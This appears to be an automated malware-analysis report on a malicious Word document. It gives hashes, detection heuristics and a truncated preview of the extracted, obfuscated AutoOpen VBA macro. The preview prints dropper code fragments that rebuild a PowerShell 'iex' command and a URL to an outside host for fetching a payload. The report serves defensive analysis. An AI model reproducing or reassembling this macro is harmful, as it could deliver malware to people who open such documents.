Office (OLE) malware analysis — malicious · 4091856ed0c9d97a

MALICIOUS

Office (OLE)

199.5 KB Created: 2017-12-22 18:13:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: 0821a83cb0a6b641f263cc4ac8b96623 SHA-1: e4be87a28aac3df92808c44e38797eb516eb99fa SHA-256: 4091856ed0c9d97a3b8f1cf2123f8e2466418dc029522e1cd44d2b943d54a5d4

282 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a legacy WordBasic AutoOpen macro that utilizes a Shell() call, indicating an attempt to execute arbitrary commands. This is a common technique for downloading and executing further malicious content. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' further supports a dropper or phishing lure functionality.

Heuristics 8

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 204,288 bytes but its declared streams total only 115,159 bytes — 89,129 bytes (44%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18212 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	18212 bytes
SHA-256: `c52f4cec85f95281d01f0c7ae648a2e830394dbff72dc2e35509f70c2879455c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "IGVtNnN" Sub AutoOpen() On Error Resume Next BmJXTGpDW = 871 / Rnd(4) + LVoUOkDb + OwHlIcRhkd * 9 + Int(WlWsJDOcwTzUbj * CStr(sFjHjvuSvQtA)) + uCYEaYn * CDate(3624 - 352183467 * 84 / 475) / wvKLWbdBQb - CSng(620) jBakLwdtC = 871 / Rnd(4) + TbbQCMiwutu + wHtKYvN * 9 + Int(QRipNzaKqa * CStr(jVLGXTuIJtj)) + XhdESqB * CDate(3624 - 352183467 * 84 / 475) / hfiLCzmDDlX - CSng(620) FUSNhlBWq = 871 / Rnd(4) + nEbjKGHjuIU + ztBnzEZjqFXVb * 9 + Int(FUwSRTKvubGb * CStr(qfTIdCQUZMtlw)) + JnijFIZBnncqAi * CDate(3624 - 352183467 * 84 / 475) / zZjYNjB - CSng(620) WwtTKQfHD = 871 / Rnd(4) + UXAHLvBSSprj + nBlQamMNjNH * 9 + Int(lmmwIVfkv * CStr(diwnifGutK)) + QGRYAFVqTlJsq * CDate(3624 - 352183467 * 84 / 475) / IPUKTLwlRXH - CSng(620) TnIhHoUza = 871 / Rnd(4) + fUZHPKtbkU + GMVPlkZwtfpt * 9 + Int(hSMIMwpvP * CStr(cuuCEBC)) + hDWNamRV * CDate(3624 - 352183467 * 84 / 475) / uwhpqbJ - CSng(620) Application.Run "BJYBUhqczCNfwY", KLKDrCQ azwlOnfpq = 871 / Rnd(4) + tVriVzqV + puUsZqrs * 9 + Int(wiPlSlcGDRvtYj * CStr(StwdVYBqUj)) + PGEYuXuktHsH * CDate(3624 - 352183467 * 84 / 475) / GGOuZZN - CSng(620) RNzaftNXW = 871 / Rnd(4) + suChWVCiWYzonP + mtXPKHRvVT * 9 + Int(JitBJXO * CStr(PwEVkkMPDBOdah)) + szqHLna * CDate(3624 - 352183467 * 84 / 475) / jNUMXlVPcaozbh - CSng(620) YmfzsNtHq = 871 / Rnd(4) + bdABSPCLowY + PXodhmlD * 9 + Int(iZLbEcOvMFZW * CStr(lulUwNYdKcJQWH)) + OjHVnosE * CDate(3624 - 352183467 * 84 / 475) / ZOmnQbtwlVlus - CSng(620) NpYfIXwBK = 871 / Rnd(4) + UFjjwDjFtpwu + akMijLfBWOVS * 9 + Int(zIfUHnOjR * CStr(jvuuCQsEwSGz)) + vpNqfjwqKNjGbZ * CDate(3624 - 352183467 * 84 / 475) / hIfBJBdnoQ - CSng(620) dkdKZALzN = 871 / Rnd(4) + fuzjATsYhOoa + TXnmFotSBYaCv * 9 + Int(flNVHNptmK * CStr(ApIEGZbCsKnlNF)) + URiWXjEz * CDate(3624 - 352183467 * 84 / 475) / nTthNBak - CSng(620) End Sub Function KLKDrCQ() On Error Resume Next VvNMEEdkI = 871 / Rnd(4) + wfnkGwkIlsjpCH + bTIdvdkASqXEwK * 9 + Int(MODZlrwtmhj * CStr(tzvKzmXM)) + GiwVOfVuitl * CDate(3624 - 352183467 * 84 / 475) / JfVldWGdZVwOSq - CSng(620) zuwzA = 871 / Rnd(4) + FZcUaoKqkd + qCtPVDuOXlaj * 9 + Int(DHITKkasVNwBJM * CStr(PrwqawTwXbavXk)) + misfQSfrfA * CDate(3624 - 352183467 * 84 / 475) / uVovOMr - CSng(620) dvTYaXc = Mid("mujGr85E872FEX'a.t7EV+7EVk/U7EV+7EVbsnq'+'7'+'EV+7EVt/'+',http:/7EV+Fn4+Fn47EV/w7EV+7EVw7EV+7EVw.cola-i7EV+7EVnfo.7EV+7'+'EVnl/Ts7EV+7EVZ7EV+7EVF2FNtRJ", 15, 131) UXZfwNKSibv = 871 / Rnd(4) + WjXSbzz + fHDXMcz * 9 + Int(nuMkTaY * CStr(QQjClmhDXd)) + OKbKBJZpiawtAZ * CDate(3624 - 352183467 * 84 / 475) / ITGGhwHCB - CSng(620) bUCCvIUuhz = 871 / Rnd(4) + XOonoUSNMowh + BkHqsBpNJrE * 9 + Int(uXPWuJmKAXSz * CStr(YlSZRjDjjC)) + jlmjwVOXkEuzCq * CDate(3624 - 352183467 * 84 / 475) / fKXidRIRT - CSng(620) RnZcYT = 871 / Rnd(4) + NzUsZAzj + ltLjLatktvR * 9 + Int(jcUiOwQvCG * CStr(ZAnMFzFa)) + KWoXwjvjoLNGkm * CDate(3624 - 352183467 * 84 / 475) / UAOLDjncilm - CSng(620) LIIwFOkCQf = Mid("G2Wr5jchAR]39) \|.( $psHoMe[21]+$PShome[30]UzqiQ9GKHwD1qoRpijfkJPlc", 7, 36) iohZImz = 871 / Rnd(4) + WnrKBCNUQ + IXCNiJvPUioPj * 9 + Int(BsIBYhXUSTahWM * CStr(BjcmzKIIKzTW)) + zpbHEsJItMwjS * CDate(3624 - 352183467 * 84 / 475) / EjnzmijSzLdjo - CSng(620) BWoHCkadP = 871 / Rnd(4) + hCjYJGVQkDR + ZMTLTDWasPfK * 9 + Int(rEzSpzJPPdZP * CStr(MLWTrmroOotwWa)) + dhSWYqSBXw * CDate(3624 - 352183467 * 84 / 475) / FHWKjtvUqLEZXt - CSng(620) GQaCuRZF = 871 / Rnd(4) + kwBFKiWcsSdiD + IUjChVDYWC * 9 + Int(oMfsPdUEPYvK * CStr(ZoRcrUTIiGKcf)) + CSqLczXVRrj * CDate(3624 - 352183467 * 84 / 475) / pJZnBMKpdsD - CSng(620) OYjPztlQWdm = Mid("thwm7GYKVEMzFnh,Fn4resFn4).ReplAce(([ChAr]'+'52+[ChAr]7'+'0+[ChAr]89),Fn4SfhFn4))') -rePLACE 'res',[chAR]124-rePLACE ([chAR]83+[chAR]102+[chAR]104),[chAR]36-CrEplAcE 'Fn4',[VzmCXKb0v0", 16, 162) hdkwI = 871 / Rnd(4) + tdQDTTWom + KCqItKwVvjjS * 9 + Int(FADBjKY * CStr(vdFwpkUi)) + iTkcYqEMzBG * CDate(3624 - 352183467 * 84 / 475) / bNkbZLD - CSng(620) qjBnVbLY = 871 / Rnd(4) + NcJCYLXYsiothq + KBAbSvXwitWbi * 9 + Int(JDJEcOlw * CStr(wiaGBnnIm)) + ilHPPWD * CDate(3624 - 352183467 * 84 / 475) / fbICkpLibioEc - CSng(620) jd ... (truncated)

SHA-256: c52f4cec85f95281d01f0c7ae648a2e830394dbff72dc2e35509f70c2879455c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "IGVtNnN"
Sub AutoOpen()
On Error Resume Next
BmJXTGpDW = 871 / Rnd(4) + LVoUOkDb + OwHlIcRhkd * 9 + Int(WlWsJDOcwTzUbj * CStr(sFjHjvuSvQtA)) + uCYEaYn * CDate(3624 - 352183467 * 84 / 475) / wvKLWbdBQb - CSng(620)
jBakLwdtC = 871 / Rnd(4) + TbbQCMiwutu + wHtKYvN * 9 + Int(QRipNzaKqa * CStr(jVLGXTuIJtj)) + XhdESqB * CDate(3624 - 352183467 * 84 / 475) / hfiLCzmDDlX - CSng(620)
FUSNhlBWq = 871 / Rnd(4) + nEbjKGHjuIU + ztBnzEZjqFXVb * 9 + Int(FUwSRTKvubGb * CStr(qfTIdCQUZMtlw)) + JnijFIZBnncqAi * CDate(3624 - 352183467 * 84 / 475) / zZjYNjB - CSng(620)
WwtTKQfHD = 871 / Rnd(4) + UXAHLvBSSprj + nBlQamMNjNH * 9 + Int(lmmwIVfkv * CStr(diwnifGutK)) + QGRYAFVqTlJsq * CDate(3624 - 352183467 * 84 / 475) / IPUKTLwlRXH - CSng(620)
TnIhHoUza = 871 / Rnd(4) + fUZHPKtbkU + GMVPlkZwtfpt * 9 + Int(hSMIMwpvP * CStr(cuuCEBC)) + hDWNamRV * CDate(3624 - 352183467 * 84 / 475) / uwhpqbJ - CSng(620)
Application.Run "BJYBUhqczCNfwY", KLKDrCQ
azwlOnfpq = 871 / Rnd(4) + tVriVzqV + puUsZqrs * 9 + Int(wiPlSlcGDRvtYj * CStr(StwdVYBqUj)) + PGEYuXuktHsH * CDate(3624 - 352183467 * 84 / 475) / GGOuZZN - CSng(620)
RNzaftNXW = 871 / Rnd(4) + suChWVCiWYzonP + mtXPKHRvVT * 9 + Int(JitBJXO * CStr(PwEVkkMPDBOdah)) + szqHLna * CDate(3624 - 352183467 * 84 / 475) / jNUMXlVPcaozbh - CSng(620)
YmfzsNtHq = 871 / Rnd(4) + bdABSPCLowY + PXodhmlD * 9 + Int(iZLbEcOvMFZW * CStr(lulUwNYdKcJQWH)) + OjHVnosE * CDate(3624 - 352183467 * 84 / 475) / ZOmnQbtwlVlus - CSng(620)
NpYfIXwBK = 871 / Rnd(4) + UFjjwDjFtpwu + akMijLfBWOVS * 9 + Int(zIfUHnOjR * CStr(jvuuCQsEwSGz)) + vpNqfjwqKNjGbZ * CDate(3624 - 352183467 * 84 / 475) / hIfBJBdnoQ - CSng(620)
dkdKZALzN = 871 / Rnd(4) + fuzjATsYhOoa + TXnmFotSBYaCv * 9 + Int(flNVHNptmK * CStr(ApIEGZbCsKnlNF)) + URiWXjEz * CDate(3624 - 352183467 * 84 / 475) / nTthNBak - CSng(620)
End Sub
Function KLKDrCQ()
On Error Resume Next
VvNMEEdkI = 871 / Rnd(4) + wfnkGwkIlsjpCH + bTIdvdkASqXEwK * 9 + Int(MODZlrwtmhj * CStr(tzvKzmXM)) + GiwVOfVuitl * CDate(3624 - 352183467 * 84 / 475) / JfVldWGdZVwOSq - CSng(620)
zuwzA = 871 / Rnd(4) + FZcUaoKqkd + qCtPVDuOXlaj * 9 + Int(DHITKkasVNwBJM * CStr(PrwqawTwXbavXk)) + misfQSfrfA * CDate(3624 - 352183467 * 84 / 475) / uVovOMr - CSng(620)
dvTYaXc = Mid("mujGr85E872FEX'a.t7EV+7EVk/U7EV+7EVbsnq'+'7'+'EV+7EVt/'+',http:/7EV+Fn4+Fn47EV/w7EV+7EVw7EV+7EVw.cola-i7EV+7EVnfo.7EV+7'+'EVnl/Ts7EV+7EVZ7EV+7EVF2FNtRJ", 15, 131)
UXZfwNKSibv = 871 / Rnd(4) + WjXSbzz + fHDXMcz * 9 + Int(nuMkTaY * CStr(QQjClmhDXd)) + OKbKBJZpiawtAZ * CDate(3624 - 352183467 * 84 / 475) / ITGGhwHCB - CSng(620)
bUCCvIUuhz = 871 / Rnd(4) + XOonoUSNMowh + BkHqsBpNJrE * 9 + Int(uXPWuJmKAXSz * CStr(YlSZRjDjjC)) + jlmjwVOXkEuzCq * CDate(3624 - 352183467 * 84 / 475) / fKXidRIRT - CSng(620)
RnZcYT = 871 / Rnd(4) + NzUsZAzj + ltLjLatktvR * 9 + Int(jcUiOwQvCG * CStr(ZAnMFzFa)) + KWoXwjvjoLNGkm * CDate(3624 - 352183467 * 84 / 475) / UAOLDjncilm - CSng(620)
LIIwFOkCQf = Mid("G2Wr5jchAR]39) |.( $psHoMe[21]+$PShome[30]UzqiQ9GKHwD1qoRpijfkJPlc", 7, 36)
iohZImz = 871 / Rnd(4) + WnrKBCNUQ + IXCNiJvPUioPj * 9 + Int(BsIBYhXUSTahWM * CStr(BjcmzKIIKzTW)) + zpbHEsJItMwjS * CDate(3624 - 352183467 * 84 / 475) / EjnzmijSzLdjo - CSng(620)
BWoHCkadP = 871 / Rnd(4) + hCjYJGVQkDR + ZMTLTDWasPfK * 9 + Int(rEzSpzJPPdZP * CStr(MLWTrmroOotwWa)) + dhSWYqSBXw * CDate(3624 - 352183467 * 84 / 475) / FHWKjtvUqLEZXt - CSng(620)
GQaCuRZF = 871 / Rnd(4) + kwBFKiWcsSdiD + IUjChVDYWC * 9 + Int(oMfsPdUEPYvK * CStr(ZoRcrUTIiGKcf)) + CSqLczXVRrj * CDate(3624 - 352183467 * 84 / 475) / pJZnBMKpdsD - CSng(620)
OYjPztlQWdm = Mid("thwm7GYKVEMzFnh,Fn4resFn4).ReplAce(([ChAr]'+'52+[ChAr]7'+'0+[ChAr]89),Fn4SfhFn4))')  -rePLACE  'res',[chAR]124-rePLACE  ([chAR]83+[chAR]102+[chAR]104),[chAR]36-CrEplAcE  'Fn4',[VzmCXKb0v0", 16, 162)
hdkwI = 871 / Rnd(4) + tdQDTTWom + KCqItKwVvjjS * 9 + Int(FADBjKY * CStr(vdFwpkUi)) + iTkcYqEMzBG * CDate(3624 - 352183467 * 84 / 475) / bNkbZLD - CSng(620)
qjBnVbLY = 871 / Rnd(4) + NcJCYLXYsiothq + KBAbSvXwitWbi * 9 + Int(JDJEcOlw * CStr(wiaGBnnIm)) + ilHPPWD * CDate(3624 - 352183467 * 84 / 475) / fbICkpLibioEc - CSng(620)
jd
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.